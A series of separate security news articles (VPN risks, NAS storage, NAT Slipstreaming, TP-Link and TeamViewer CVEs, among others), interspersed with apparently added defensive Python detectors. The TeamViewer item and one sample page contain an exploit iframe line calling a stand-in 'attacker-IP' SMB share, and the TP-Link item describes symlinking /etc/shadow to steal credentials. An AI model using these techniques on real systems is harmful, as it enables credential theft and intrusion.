Why a VPN can be dangerous for security

Why Using a VPN Is Helpful

A VPN is very useful when we connect to a public Wi-Fi network, or to any network that could be dangerous. We do not really know who may be behind it or whether it has been maliciously configured. We could be the victim of an identity theft attempt. With a service of this type, our connection is encrypted. It is as if it were inside a tunnel whose content no intruder could access.

It is also useful when we want to bypass the blocking of certain services in a specific country. Some applications are not available in certain territories, and this type of software lets us bypass the block.

It also allows us to securely access other devices from anywhere. We can do so as if we were on the local network even though we are somewhere else.

On the other hand, we can gain anonymity on the network. We can prevent our operator from knowing which sites we visit, download anonymously, etc.

How a VPN can become our security enemy

A VPN is designed to help us improve security and privacy, as we have seen. However, sometimes it can turn into the opposite. It can become a real problem affecting our security and privacy.

We are going to detail the reasons that could make a VPN service unsafe.

Vulnerabilities in software

This is perhaps the most typical security problem. VPN software can sometimes contain vulnerabilities: flaws in the implementation of the code that can open the door to attackers and leak users' information.

Fortunately, users can take certain measures to protect themselves or keep this from affecting them. We need to keep the software up to date, with all security patches installed. Vulnerabilities that arise are sometimes resolved by the manufacturers themselves.

Bad VPN practices

A VPN may be configured to carry out bad practices that put users' security at risk. This can happen especially when we install free software that does not offer full guarantees.

User data is very valuable. This means that many platforms and services on the Internet are looking for a way to get hold of it. Free VPNs can offer their services in exchange for stealing users' data and information. They can be maliciously configured to do so.

Use of weak protocols

As we know, VPNs use different types of protocols to work. We can mention the PPTP protocol, which was one of the first to be used, in the 1990s. There is also L2TP, which establishes a tunnel but does not have any type of encryption. A more recent and secure one is IKEv2.

A VPN service may therefore use an inappropriate, weak protocol. This logically compromises our information and could put our privacy and security at risk. A weak protocol can be broken more easily.

HTTPS attack

HTTPS is the encryption protocol for web pages. It is the typical green padlock that we can see in browsers. When we surf the Internet it is important to verify that a page uses this protocol before entering personal data or information.

Now, a VPN could change the way it carries traffic. It could lead us to a page that has been maliciously modified and seriously compromise our security.

Download VPN with malware

Yes, we may directly download a VPN with malware. This happens when we download an application of this type from unofficial sources. We do not really know whether the software has been maliciously modified.

Our advice to avoid this is always to download from official sources. Also, in the case of VPNs, the ideal is to use paid applications. This way we will avoid possible problems.

Private cloud on NAS, the best alternative to Google Photos

Private cloud on NAS, the alternative to Google Photos

When we use third-party services, as is the case with Google Photos, and especially if they are free, we run the risk that at any given moment they stop providing service. Ultimately these are tools or platforms that need maintenance, a cost in short. As soon as they are no longer profitable or are no longer part of that company’s strategy, they can be forgotten.

What we have just mentioned is a major problem when we trust that the service will be available forever and start saving photos or videos, for example. Then we are suddenly told that the service is being limited or will no longer be available, and we have to find an alternative to keep everything the same.

Without a doubt, an ideal alternative to Google Photos is the private cloud on NAS. It gives us absolute control over our files. We can manage it as we want, have enough storage for all our files and they will also be safe, without depending on third-party services that could even have vulnerabilities. You can see our list of best NAS servers.

Complete control with the private cloud

Having a NAS server allows us to store all types of files and have total control over them. We can save photos and videos in the same way as in Google Photos, but on our own device.

The best option is undoubtedly to use a NAS server with 2 or more bays. We can choose RAID 1, which uses two identical disks (also known as mirrored disks): one of them stores everything we save, while the other keeps a backup copy. In this way, if at any time we have a problem, a disk fails or information is lost, we always have that backup copy on the second disk. We have a list of cheap 2-bay NAS servers.

We can also opt for RAID 5, which also provides faster access to content, using one of the disks to tolerate a failure in any of the other disks.

Applications to save photos in the private cloud

We have different programs that allow us, in a centralized way, to store photos and videos in our private cloud on NAS. They give us options similar to Google Photos, but all on our own device.

An example is the QNAP photo app. It allows us to upload images from our mobile device, even in real time. That is, we can configure it so that each photograph we take is automatically uploaded to our cloud. In this way we avoid data loss if our mobile is damaged or we lose it on a trip. We would have all the content that we are generating in a safe place.

An alternative option is Photo Station, from Synology. It allows us to store and manage all the photographs that we upload to our private cloud in a simple way. We can create albums, share them with other users, access them from anywhere, create automatic backups from the mobile, etc.

We also have the option of Photo Gallery, from ASUSTOR. As in the previous cases, it allows us to synchronize our photos on the NAS to have them available anywhere. We can create folders, share them easily and quickly search for a specific image, all of this always under our control.

In short, photo applications like the ones we have mentioned allow us to have full control of photos and videos on our private NAS cloud. An ideal alternative to Google Photos to never lose the photos we take on trips, events or any memory that we do not want to erase.

Much more than saving photos

But the private cloud does not only allow us to save photos and videos. It is undoubtedly a very important instrument for both private users and companies. It allows us to store all kinds of files and have them always available anywhere. We already know that today it is very common to switch between devices, and what better way to centralize everything than to use a NAS server.

It is also a very good solution for creating backups and avoiding problems such as ransomware, since we would always have everything stored in another place from which to restore the information. It is very important to always make copies of our devices so as not to lose data in case of a problem.

Another very important issue is remote work. The Covid-19 pandemic has brought important changes in this regard, and more and more people are working remotely. A NAS server also allows us to share work with other users remotely and to keep full control without depending on third-party platforms or services.

On the other hand, the private cloud allows us to avoid possible limitations when it comes to sharing large files, as happens with free platforms. We can share folders with friends or family regardless of the number and size of the files they contain.

Broadcom launches a new processor to exceed 2 Gbps

Broadcom launches a new processor

Broadcom has released a new processor that it has named BCM4389. The objective is to be able to exceed 2 Gbps when we browse over Wi-Fi networks. This will be achieved by taking advantage of the new 6 GHz spectrum and being able to connect multiple devices there. In addition, it will also make it possible to extend the battery life of these devices.

It should be mentioned that this processor, the BCM4389, is the first Wi-Fi 6E processor. It will use the 6 GHz band. For now we will have to wait for it to be operational. As we know, this means that the channel bandwidth is going to be wider, with what this implies.

The BCM4389 processor is designed for smartphones and future augmented and virtual reality devices. The company has announced that thanks to this processor latency will also be reduced. It will reduce congestion when multiple devices are connected, and that will give better results.

Logically, the last thing we mentioned, the improvement in latency, is going to be fundamental for virtual reality. We have more and more devices that use it, and the trend is for that to grow. Improving connectivity, with what that means for stability and quality, will be essential to carry out different functions.

Regarding the devices, Broadcom has indicated that there will be a wide range of home routers, gateways, business access points and devices for BCM4389. Of course, as we have indicated, we will have to wait until the new 6 GHz band is really in operation.

We recommend you read our tutorial on how to scan a WiFi network with Network Scanner, and also how to see who is connected to our home Wi-Fi.

We have more and more connected devices

Wi-Fi networks are very important today. We have more and more equipment connected wirelessly, and that also translates into a greater need for more powerful and capable equipment. If we look back just a few years, it was normal to connect a computer by cable. That has changed thanks in part to the rise of mobile devices.

But the trend indicates that the use of Wi-Fi wireless networks is going to increase. We have more and more IoT devices in our possession, and that means that we will need more powerful routers to be able to offer a good connection without interruptions.

All this means that the use of more powerful processors also translates into an increase in speed. That is what Broadcom intends, which wants to exceed 2 Gbps when we navigate through Wi-Fi networks. It is certainly a very interesting speed.

We leave you an article about how to improve the Wi-Fi network and also one about myths and false truths about Wi-Fi.

What data and tools expose us most on the network

Data and tools that expose us on the Internet

As we say, there is certain information, and some tools or functions that we use, that can especially expose us on the net. They could affect our privacy and security. This means that our computers can suffer problems, and that we can be victims of certain types of attacks and of identity theft.

IP address

One of the pieces of data that can expose us the most on the network is the IP address. As we know, each device has an address with which it is identified. Someone could find out, for example, our approximate location. It can even be used by advertising companies or our own operator.

To avoid this problem, to prevent the IP address from being leaked, we have at our disposal the possibility of using VPN tools or using the Tor browser.

Metadata in images

The metadata in images can also expose information that affects our privacy. It includes data such as the camera we use, the location, the date, our name…

This is something that not only affects photos, but also text files. We can always use tools to remove metadata from files.

Cookies

Cookies are files that are stored on a device when we browse the Internet. They allow us to be identified when we re-enter a page, which saves time by not having to log in again. However, some cookies can be used by third parties to track us.

To avoid this we can frequently delete cookies, as well as use privacy-based browsers such as Tor.

Extensions

Extensions are, of course, tools that can clearly expose us on the network. We use them very frequently in our day-to-day life, but we must bear in mind that they can sometimes be a threat. They could collect personal data, send reports on our browsing and, ultimately, put privacy at risk.

It is very important that when we go to install add-ons in the browser we always do it from official sources. In this way we will avoid problems that compromise us.

Shortened links

Shortened links can be a threat that affects all types of systems. We have all received a link of this kind, where the URL appears shortened. In itself this does not mean that it is a threat, but it could be the strategy used by an attacker to hide the real link.

Luckily we can use different platforms that tell us what the real link is. This way we will avoid opening one that is actually a threat.

Emails we receive

Finally, the emails we receive can also expose us on the Internet. We could be tracked through images that are loaded automatically. We already saw in another article how to avoid image tracking in Gmail.

This new attack directly affects your Internet browser

Cybercriminals do not rest; they are always looking for new targets by exploiting security breaches. In this case, new attacks that affect Internet browsers could compromise our security. Samy Kamkar has discovered the Slipstream NAT attacks that affect our browsers, and we have already explained in RedesZone how they work. The developers of the most popular browsers are already preparing to block this new attack technique, and today in RedesZone we are going to explain how they will do it.

How Slipstream NAT Attacks Work

The attack was discovered by the security researcher Samy Kamkar, and the attack method has been named NAT Slipstreaming. Slipstream NAT attacks require victims to visit an attacker’s malicious website or a site with maliciously crafted ads. Samy Kamkar has provided a demonstration of this attack to show how it works.

Slipstream NAT attacks exploit the user’s browser, along with the Application Level Gateway (ALG) connection tracking mechanism built into NATs, routers and firewalls, by chaining the extraction of an internal IP through a timing attack or WebRTC, automated remote MTU detection and IP fragmentation. Also, because it is the NAT or firewall that opens the destination port, this bypasses any browser-based port restrictions.

Slipstream NAT attacks take advantage of arbitrary control of the data portion of some TCP and UDP packets without including HTTP or other headers. In this case, the attack is based on a new packet injection technique that affects both modern and older browsers. It should also be added that it is a modernized version of the NAT Pinning technique by Samy Kamkar from 2010, which was presented at DEFCON 18 + Black Hat 2010. Additionally, new techniques for local IP address discovery have been included.

Regarding the attack, it should be noted that it requires the NAT or the firewall to support ALGs (Application Level Gateways), which are mandatory for protocols that can use multiple ports (control channel + data channel) such as SIP and H323 (VoIP protocols), FTP, IRC DCC, etc.

Other research and proof of concept

Samy Kamkar made other discoveries that are not used in this attack. However, they could potentially be used to carry out other types of attacks. In this sense, he found out:

  • IP fragmentation allows full control of all data in the IP data section. This results in full control of a UDP header, including the source and destination ports in the overflowed packet.
  • If a port is already taken, the port listened on is incremented until the port overflows to 0.
  • STUN does not have authentication implemented in any modern browser.

You can also download the proof of concept of the Slipstream NAT attacks from here.

Browsers prepare to block this attack

To stop the Slipstream NAT attacks, those responsible for the web browsers plan to block TCP ports 5060 and 5061, which are used in this attack, by adding them to the restricted list.

According to Adam Rice, a Chromium developer, the intention is to block HTTP and HTTPS connections to SIP ports 5060 and 5061. This will cause connections to servers that use those ports to fail: connections such as http://web.com:5060/ or https://web.com:5061/ would no longer work. In addition, they would improve security measures, as tests that trigger a server on an arbitrary port are expected to be more difficult to use than they are right now.

Finally, Firefox, Safari, Chromium and Chrome are working to have the Slipstream NAT attacks solved as soon as possible, but it is not yet known when they will do so. On November 4 the solution to the problem was incorporated into the Chromium bug tracker, so it will still take a few weeks to see it in the final stable version.
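Until the browsers ship that restriction, a web proxy log can show which internal clients have been sending HTTP or HTTPS requests to the two SIP ports. The following is an added example, not code from the original article or from any browser; the log format, the sample lines and the function names are constructed for illustration.

```python
from collections import defaultdict
from urllib.parse import urlsplit

# Ports the article says browsers are adding to their restricted list.
SIP_PORTS = {5060, 5061}
DEFAULT_PORTS = {"http": 80, "https": 443}

# Constructed proxy log lines: "<timestamp> <client-ip> <method> <url>".
SAMPLE_LOG = """\
2020-11-05T10:01:12Z 192.168.1.23 GET http://web.com:5060/
2020-11-05T10:01:13Z 192.168.1.23 POST https://web.com:5061/upload
2020-11-05T10:02:40Z 192.168.1.40 GET https://web.com/
2020-11-05T10:03:02Z 192.168.1.40 GET http://web.com:8080/status
2020-11-05T10:03:30Z 192.168.1.51 GET http://[2001:db8::1]:5060/x
2020-11-05T10:04:00Z 192.168.1.51 GET http://web.com:99999/
this line is not a log record
"""


def effective_port(url):
    """Return the TCP port an HTTP(S) client would connect to, or None."""
    try:
        parts = urlsplit(url)
        port = parts.port  # ValueError on a non-numeric or out-of-range port
    except ValueError:
        return None
    scheme = parts.scheme.lower()
    if scheme not in DEFAULT_PORTS or not parts.hostname:
        return None
    # No explicit port means the scheme default (80 or 443).
    return port if port is not None else DEFAULT_PORTS[scheme]


def is_restricted(url):
    """True when the request targets one of the SIP ports over HTTP(S)."""
    return effective_port(url) in SIP_PORTS


def clients_hitting_sip_ports(log_text):
    """Group the flagged URLs by the internal client that requested them."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:  # skip anything that is not a log record
            continue
        _timestamp, client, _method, url = fields
        if is_restricted(url):
            hits[client].append(url)
    return dict(hits)


if __name__ == "__main__":
    for client, urls in clients_hitting_sip_ports(SAMPLE_LOG).items():
        print(client, urls)
```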

The article This new attack directly affects your Internet browser was published in RedesZone.

What is and why hidden malware increases in encrypted traffic

What is malware hidden in encrypted traffic

We may think that when we browse a page that is encrypted, one with HTTPS in the URL, it is already reliable. It is true that this is an indication that we must look for when we are going to enter personal data or make a payment. However, it does not by itself mean that it is a totally secure site.

This is precisely what hackers take advantage of. They rely on users' greater confidence when browsing encrypted pages to hide the malware precisely there.

The fact that a page uses HTTPS does not mean that it cannot contain malware. As we say, this is precisely where cybercriminals are sneaking in malware the most, with the aim of infecting victims’ systems. It is not something new, but it is something that is gaining much prominence.

A group of security researchers from Zscaler has presented a report in which they show how hidden malware in encrypted traffic has grown by 260% during the first nine months of 2020 compared to the same period of the previous year.

The pandemic pushes these types of attacks

They also indicate that the Covid-19 pandemic has partly increased attacks using malware hidden in encrypted SSL/TLS traffic. For example, ransomware delivered through SSL/TLS channels between March and September has grown by 500%. Most of these attacks have been directed at technology and telecommunications companies, but also at healthcare organizations.

The rise of telecommuting, one of the changes that the Covid-19 pandemic has caused, is another cause of the increase in this type of attacks directed at users. More and more people work from home and in many cases these are users who do not have the necessary knowledge to be safe on the Internet.

Zscaler’s analysis also shows an increase in attacks that are based on SSL / TLS and that have been delivered through reliable cloud storage services such as Google Drive, Dropbox, OneDrive or AWS. They host malicious content on these services that are now widely used due to the pandemic and the increase in remote work.

Without a doubt, this upward trend is a great challenge for organizations. In addition, security tools are not enough to protect us from these types of problems. It is essential to maintain common sense and not make mistakes. In another article we leave you with a series of tips to avoid email malware.

A security breach allows the TP-Link AC1750 router to be hacked

Security issues with the TP-Link AC1750 router

Specifically, the problem that we mentioned affects the TP-Link AC1750 (Archer C7) router. It is one of the company's most popular and best-selling models. As with many modern routers, this model has a USB port to connect other equipment, such as printers or memory drives, to modify the firmware or to share content on the network.

Precisely that USB port is what has caused the problem. When a USB drive is connected, the router activates an SMB share, enables FTP, and powers up a DLNA media server. The contents of the unit can be accessed using these protocols.

A security researcher has tested what could happen with a malicious flash drive. He found a vulnerability that can be exploited to read from the router’s file system before authentication. This would allow the login credentials to be stolen. It is possible through symbolic links.

Keep in mind that the TP-Link AC1750 router runs OpenWRT. This means that symbolic links can point to files normally present on Linux-based machines. The malicious USB drive must be formatted with an NTFS partition, and the content will later be accessible over the network.

Now, this security researcher has found that, by default, symbolic links are not dereferenced if accessed via SMB or FTP. However, symbolic links will be followed if accessed via DLNA. The interesting thing is that only multimedia file types will be served. This requirement can be met by naming the symbolic link with a multimedia extension, such as .wav. For example, a symbolic link to /etc/shadow would be called shadow.wav.

An important point made by the security researcher is that the plain text password for the administrative web interface is stored in /etc/config/usbshare by default. With this password, we could change the router’s configuration options.

The researcher created three symbolic links to test his theory. After plugging in the flash drive he was able to access the files via DLNA using a client like VLC. The picture showing this can be seen on Medium.
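The difference between checking only the file extension and checking where a link actually resolves can be shown with a small file-serving check. This is an added example, not code from the original article, from TP-Link or from any DLNA server; the function names are hypothetical, the files are constructed in a temporary directory, and it assumes a system where unprivileged symlink creation works (Linux or macOS).

```python
import os
import tempfile

MEDIA_EXTENSIONS = {".wav", ".mp3", ".mp4", ".jpg"}


def naive_can_serve(share_root, name):
    """Extension-only check: any existing path with a media extension passes."""
    path = os.path.join(share_root, name)
    has_media_ext = os.path.splitext(name)[1].lower() in MEDIA_EXTENSIONS
    return has_media_ext and os.path.exists(path)  # exists() follows symlinks


def hardened_can_serve(share_root, name):
    """Serve only media files whose resolved location stays inside the share."""
    if os.path.splitext(name)[1].lower() not in MEDIA_EXTENSIONS:
        return False
    root = os.path.realpath(share_root)
    target = os.path.realpath(os.path.join(root, name))
    if os.path.commonpath([root, target]) != root:
        return False  # a symlink or "../" led outside the shared drive
    return os.path.isfile(target)


def find_escaping_links(share_root):
    """Audit a mounted drive: list symlinks that resolve outside of it."""
    root = os.path.realpath(share_root)
    found = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for entry in dirnames + filenames:
            full = os.path.join(dirpath, entry)
            if os.path.islink(full):
                target = os.path.realpath(full)
                if os.path.commonpath([root, target]) != root:
                    found.append(os.path.relpath(full, root))
    return sorted(found)


def demo():
    """Build a constructed 'USB share' and compare both checks on it."""
    with tempfile.TemporaryDirectory() as base:
        share = os.path.join(base, "usb")
        os.mkdir(share)
        # Stands in for a system file that lives outside the shared drive.
        secret = os.path.join(base, "router-config.txt")
        with open(secret, "w") as handle:
            handle.write("constructed secret\n")
        with open(os.path.join(share, "song.wav"), "w") as handle:
            handle.write("constructed audio\n")
        # A link named like media that points outside the share,
        # and a harmless link that stays inside it.
        os.symlink(secret, os.path.join(share, "shadow.wav"))
        os.symlink(os.path.join(share, "song.wav"),
                   os.path.join(share, "alias.wav"))
        return {
            "naive_shadow": naive_can_serve(share, "shadow.wav"),
            "hardened_shadow": hardened_can_serve(share, "shadow.wav"),
            "hardened_song": hardened_can_serve(share, "song.wav"),
            "hardened_alias": hardened_can_serve(share, "alias.wav"),
            "escaping": find_escaping_links(share),
        }


if __name__ == "__main__":
    print(demo())
```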

Here we can see how “usbshare” can be accessed via HTTP at http://192.168.0.1:8200/MediaItems/21.wav. The content of this file can be downloaded using the link.

When you acquire the necessary credentials, you will be able to access the web interface and access the file system.

The attack needs physical access

As we can see, this attack requires physical access to the device. It is not a scenario that we can consider ordinary. However, it could happen in a work environment, or if we invite someone to our house and they want to tamper with our router. That person could also have the access password.

In case someone attacked the router with this method, they could, among other things, create a VPN for their web traffic to pass through this hacked device.

The vulnerability has been registered as CVE-2020-5795. At the time of writing this article, TP-Link has already released a patch to correct the security flaw. It is important that users always have the latest versions available. In this case we can download it from the official website.

We leave you a tutorial on how to audit a router with Routersploit.

LoRaWAN, the threat that puts IoT devices at risk

LoRaWAN, the latest threat to IoT devices

A group of security researchers from IOActive have discovered that the LoRaWAN protocol has certain security problems that can put our devices at risk. This protocol is used globally to transmit data between IoT devices.

We can say that the LoRaWAN protocol is used at different levels. It is used by industrial IoT devices, but also at the user level in homes. Now, according to the group of security researchers we are reporting on, this protocol has vulnerabilities that can be exploited. Specifically, the encryption keys for communications between devices could be easily obtained.

This problem could cause widespread disruption of devices, as well as leave the network vulnerable and exposed, something that would affect the privacy of users. It could expose the data that is transmitted between devices. We already know that privacy is a very important factor for users and it should always be maintained.

We could mention denial of service attacks as one of the options that a potential attacker would have. Once the attackers obtain the encryption keys they could gain access to the network and cause these types of attacks and disrupt communications between connected devices.

They could also send false data. They do this by intercepting communications and replacing them with data that is false. They could, among other things, hide malicious activities.

The biggest problem, as IOActive researchers point out, is that a user or organization would not be able to tell if a LoRaWAN network is under attack or has been attacked. This, as we can imagine, makes it a significant risk for users.

How to protect the security of IoT devices

We are going to give a series of tips to maintain security in IoT devices. One of the most important is to always properly encrypt devices and change the factory settings. Many of them come with generic passwords that can be easily exploited by a hacker with the necessary knowledge. This means that we must change them and create really strong keys.

It will also be necessary to have the latest security updates. In many cases vulnerabilities emerge that are exploited by intruders to carry out their attacks. We need to install security patches and updates to fix those bugs.

Lastly, common sense will be vital. It is important that we take care of the devices when installing software and add-ons. Make sure to always install them from official sources. This is the only way to ensure that we are not installing software that has been maliciously modified.

Vulnerability in TeamViewer allows intruders without password

A bug in TeamViewer allows intruder access

As we say, TeamViewer is an important tool that allows remote access to computers on the network. This time the news is that it has a vulnerability that puts the safety of users at risk. It would allow a possible intruder to access that computer without leaving a trace and to carry out different types of attacks.

It is a reality that on many occasions security flaws arise that affect all types of software that we use in our day to day. They can compromise our privacy and put devices at risk. These vulnerabilities generally receive updates from the developers. That is what has happened in this case.

TeamViewer has rushed to release a patch to correct this important flaw. The vulnerability has been registered as CVE-2020-13699 and has been rated high severity.

To execute an attack, a user would need to navigate to a malicious page that loads an iframe in the web browser, possibly hidden or as small as a pixel so that the user does not notice it. The iframe loads itself using the “teamviewer10:” URI scheme, which tells the browser to start the TeamViewer application installed on the computer.

These custom URI schemes are used by locally installed applications that allow the user to launch them from the browser. For example, URLs that start with “skype:” in the browser would start Skype. Other commonly used apps like Slack, Zoom, and Spotify use similar URI structures.

What the attacker would do to exploit this TeamViewer vulnerability is to set the src attribute of the iframe to ‘teamviewer10: --play \\attacker-IP\share\fake.tvs’. This command makes the installed TeamViewer application connect to the attacker’s server through the SMB protocol.
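A saved page or a proxy capture can be checked for this pattern: a frame whose src hands a command-line option or an SMB (UNC) path to a locally registered URI handler. The following is an added example, not code from the original article or from TeamViewer; the sample page is constructed and reuses the article's "attacker-IP" placeholder, and the scheme list and function names are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Schemes handled by the browser itself; anything else is passed to an
# application registered on the computer (assumed list, not exhaustive).
BROWSER_SCHEMES = {"http", "https", "about", "data", "blob", "javascript"}
SCHEME_RE = re.compile(r"^\s*([A-Za-z][A-Za-z0-9+.\-]*):(.*)$", re.S)
UNC_RE = re.compile(r"\\\\[^\\\s]+\\[^\\\s]+")   # \\host\share
OPTION_RE = re.compile(r"(?:^|\s)--?[A-Za-z]")   # -x or --option

# Constructed sample page.
SAMPLE_PAGE = r"""<html><body>
<iframe src="https://example.com/widget"></iframe>
<iframe src="skype:echo123?call"></iframe>
<iframe style="width:1px;height:1px"
        src='teamviewer10: --play \\attacker-IP\share\fake.tvs'></iframe>
</body></html>"""


class FrameAudit(HTMLParser):
    """Collect frames whose src uses an application-handled URI scheme."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "frame", "embed"):
            return
        src = dict(attrs).get("src") or ""
        match = SCHEME_RE.match(src)
        if not match or match.group(1).lower() in BROWSER_SCHEMES:
            return
        # Decode %5C, %20 and similar so an encoded argument is not missed.
        rest = unquote(match.group(2))
        self.findings.append({
            "scheme": match.group(1).lower(),
            "line": self.getpos()[0],
            "passes_option": bool(OPTION_RE.search(rest)),
            "unc_path": bool(UNC_RE.search(rest)),
        })


def audit_html(html_text):
    """Return one finding per frame that launches a local URI handler."""
    parser = FrameAudit()
    parser.feed(html_text)
    parser.close()
    return parser.findings


def high_risk(findings):
    """Findings that match the pattern described in the article.

    The prefix match on "teamviewer" is an assumption meant to cover
    handlers registered by other versions of the application.
    """
    return [f for f in findings
            if f["scheme"].startswith("teamviewer")
            and (f["unc_path"] or f["passes_option"])]


if __name__ == "__main__":
    for finding in audit_html(SAMPLE_PAGE):
        print(finding)
```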

Access without password

It should also be borne in mind that a potential attacker would not need to know the user’s password. They could be authenticated automatically and thus gain access.

TeamViewer indicated that this problem affected various versions of the tool for Windows. Specifically, it affects versions 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 and 15.8.3. However, the patch has already been released for all of them. At RedesZone we recommend updating to the latest version. This is something that we must always apply to all types of software that we use. You can see the announcement on the official TeamViewer channel, where they mention that the problem has already been solved.

As we have mentioned, remote work has become very present in our day-to-day life. We leave you some tips to telework safely.

Sending emails to the wrong recipient: risks and consequences

Work emails are considered a gold mine. The amount of high-value and sensitive information we handle on a daily basis is so great that, with a single email chain, a cybercriminal can have an entire organization in their hands. Let’s not even talk about whether the data contained in that chain involves very valuable assets such as employee payroll data.

It is hard for us to accept, but employees themselves represent the main threat to the organization. Human error is much more damaging than we think. Inattention, haste and even lack of interest all contribute to this small but significant mistake: sending an email to the wrong recipient.

More than 100 “wrong” emails a week

It is an outrageous number. The company Tessian recently released a report stating that in just one week, 130 or more wrong emails are sent. Unfortunately, several of these messages contain confidential corporate information, and recipients mistakenly have access to them.

On the other hand, this error of sending emails to the wrong recipients happens more than 200,000 times a year. Even if the mistaken recipient belongs to your organization, the high risk of data leakage or of any type of attack remains, especially because employees handle the internal activities of their own area and across areas as well. Although this report focuses on the United Kingdom, it is a trend that applies to practically every country on the globe.

Is it possible to be wrong so many times?

Of course. Human error (inattention, especially) can go as far as that. But what if this results in my account being compromised? This is also possible. The wrong recipients can appear in our address book without our noticing or paying attention. They may differ from the real addresses by a letter, a number or a word of considerable length.

Pay close attention before sending any corporate email message. If necessary, check address by address. It may be that your email account is infected by some type of virus or malware. If so, we recommend reporting it to your support department so they can act immediately.
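Checking address by address can be partly automated before a message leaves the mail client. The following added example, which is not from the original article or from Tessian, compares each recipient with a trusted address book and flags addresses that differ from a known one by a letter, a number or an extra word; all addresses, thresholds and function names are constructed for illustration.

```python
# Constructed address book and draft recipients.
ADDRESS_BOOK = [
    "maria.lopez@example.com",
    "payroll@example.com",
    "j.smith@example.com",
]
DRAFT_RECIPIENTS = [
    "Maria.Lopez@example.com",        # known address, different case
    "maria.lopes@example.com",        # one letter changed
    "payroll1@example.com",           # one digit added
    "payroll.external@example.com",   # an extra word added
    "j.smith@example-mail.com",       # same name, another domain
    "newclient@example.org",          # unrelated new contact
]


def edit_distance(a, b):
    """Levenshtein distance: single-character edits needed to turn a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                # deletion
                           cur[j - 1] + 1,             # insertion
                           prev[j - 1] + (ca != cb)))  # substitution
        prev = cur
    return prev[-1]


def similar(addr, known_addr, max_distance):
    """True when addr could easily be mistaken for known_addr."""
    if edit_distance(addr, known_addr) <= max_distance:
        return True
    local, _, domain = addr.partition("@")
    k_local, _, k_domain = known_addr.partition("@")
    if local == k_local and domain != k_domain:
        return True  # same mailbox name on another domain
    # A word glued onto (or cut from) a known mailbox name, same domain.
    shares_prefix = local.startswith(k_local) or k_local.startswith(local)
    return (domain == k_domain and shares_prefix
            and min(len(local), len(k_local)) >= 4)


def review_recipients(recipients, known, max_distance=2):
    """Label each recipient 'ok', 'lookalike' (with the match) or 'unknown'."""
    known_norm = sorted({k.strip().lower() for k in known})
    report = []
    for raw in recipients:
        addr = raw.strip().lower()
        if addr in known_norm:
            report.append((addr, "ok", None))
            continue
        matches = [k for k in known_norm if similar(addr, k, max_distance)]
        if matches:
            closest = min(matches, key=lambda k: edit_distance(addr, k))
            report.append((addr, "lookalike", closest))
        else:
            report.append((addr, "unknown", None))
    return report


if __name__ == "__main__":
    for row in review_recipients(DRAFT_RECIPIENTS, ADDRESS_BOOK):
        print(row)
```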

The exit door to data breaches

In the UK alone, still according to Tessian’s report, 1,357 data breaches have been reported. All of these occurred as a result of emails sent by mistake. This type of event has increased by 300%. Alarming, right? There is no better advice than to pay due attention before sending a message. An extra minute spent on a quick review makes a difference.

We recommend you read our tutorial on the best temporary emails to protect your privacy and security.